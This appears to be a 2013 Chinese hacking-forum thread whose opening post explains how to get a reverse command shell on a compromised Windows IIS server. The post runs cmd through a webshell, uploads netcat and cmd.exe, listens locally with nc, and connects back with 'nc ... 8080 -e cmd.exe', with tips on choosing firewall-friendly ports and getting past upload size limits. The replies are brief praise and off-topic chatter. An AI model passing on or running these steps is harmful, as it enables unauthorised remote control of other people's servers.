webshell下使用NC反弹cmdshell

admin · 发表于 2013-1-21 11:17:29

前提：

1.能用WebShell运行cmd命令。
方法有很多，首先是WScript.Shell，如果被改名或者被删了，就找可运行目录上传cmd.exe。
2.上传nc。可以跟cmd.exe上传到同一目录。
步骤：
1、本地监听一个端口。
nc -vv -l -p 8080
最好是80或8080这样的端口，被防火墙拦截的几率小很多。

2、在WebShell运行下面命令连接我们监听的端口得到CmdShell:
nc -vv 步骤1监听的地址 8080 -e 上传的cmd.exe

上传cmd.exe的时候，如果服务器限制了上传文件小于200k（windows 2003 iis默认就这样），可以使用附件中小于200k的cmd。
反弹成功后，本地监听的命令窗口命令行窗口提示变为C:\WINDOWS\system32\inetsrv>

通过webshell反弹的cmd继承IIS的权限，一般权限较低。但是还是很方便执行系统命令的。

12315123 · 发表于 2013-2-1 13:25:22

不错，看看。

黑仔 · 发表于 2014-10-20 03:08:40

好帖，有才

小月 · 发表于 2014-10-26 22:42:15

支持你加分

那你还问 · 发表于 2014-11-6 08:59:57

我顶啊。接着顶

名将阿克 · 发表于 2014-11-18 19:28:57

一个有信念者所开发出的力量，大于99个只有兴趣者。

、嘿 · 发表于 2014-12-6 14:41:06

不错!

清一色 · 发表于 2014-12-29 18:25:14

呵呵,支持一下哈

高管啊 · 发表于 2015-1-29 15:28:16

一个个全都骑到老大头上来了...

好好好 · 发表于 2015-3-3 19:10:18

满城尽待年终奖，弄弄才是喇叭腔